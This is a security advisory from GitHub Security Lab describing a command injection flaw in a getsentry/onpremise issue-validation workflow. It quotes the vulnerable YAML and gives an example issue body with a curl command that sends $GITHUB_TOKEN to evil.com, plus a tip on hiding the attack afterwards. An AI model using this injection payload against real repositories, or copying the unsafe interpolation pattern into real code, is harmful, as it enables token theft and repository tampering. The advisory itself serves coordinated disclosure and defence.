February 3, 2021

GHSL-2021-010: Command injection in getsentry/onpremise workflow

Jaroslav Lobačevski

Coordinated Disclosure Timeline

  • 2021-01-18: Report sent to maintainers.
  • 2021-01-19: Issue resolved.

Summary

The validate-new-issue.yml GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration.

Product

getsentry/onpremise GitHub repository

Tested Version

The latest changeset validate-new-issue.yml to the date.

Details

Issue: Issue body is used to format a shell command

on:
  issues:
    types: ['opened']
...
      env:
        GITHUB_TOKEN: ${{ github.token }}
      run: |
        # Trust users who belong to the getsentry org.
        if gh api "https://api.github.com/orgs/getsentry/members/${{ github.actor }}" >/dev/null 2>&1; then
          echo "Skipping validation, because ${{ github.actor }} is a member of the getsentry org."
          exit 0
        else
          echo "${{ github.actor }} is not a member of the getsentry org. 🧐"
        fi
        # Look for a template where the headings match this issue's
        echo "${{ github.event.issue.body }}" > issue-body
...

Impact

This vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a user may create an issue with the title It doesn't work on my machine and body `curl http://evil.com?$GITHUB_TOKEN` which will exfiltrate the repository token capable to to modify the repository to the attacker controlled server. To make the attack less visible an attacker may modify the body of the issue to Never mind my bad. and close it.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-010 in any communication regarding this issue.